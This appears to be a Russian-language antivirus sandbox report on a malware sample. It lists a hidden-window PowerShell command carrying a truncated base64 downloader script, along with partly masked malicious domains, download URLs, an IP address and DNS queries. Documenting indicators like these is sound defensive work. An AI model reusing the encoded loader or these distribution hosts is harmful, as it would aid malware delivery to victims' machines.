Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpADcAXwBfADkAXwA4AD0AKAAnAGoAMgBfADUAJwArACcANAAnACsAJwA0AF8AJwApADsAJABVAF8AXwBfADMAMgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6AF8AMgBfADgAXwAyADAAPQAoAC...
- '81.##.198.200':80
- 'so####.citycheb.ru':80
- 'th####ochoi.edu.vn':80
- 'fi###chool.ru':80
- http://so####.citycheb.ru/Epe9RyrbX
- http://th####ochoi.edu.vn/3X1Gc99SU
- http://fi###chool.ru/zCBKJesoEs
- DNS ASK so####.citycheb.ru
- DNS ASK th####ochoi.edu.vn
- DNS ASK fi###chool.ru
- DNS ASK di####hiennam.vn
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABpADcAXwBfADkAXwA4AD0AKAAnAGoAMgBfADUAJwArACcANAAnACsAJwA0AF8AJwApADsAJABVAF8AXwBfADMAMgA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAB6AF8AMgBfADgAXwAyADAAPQAoAC...' (со скрытым окном)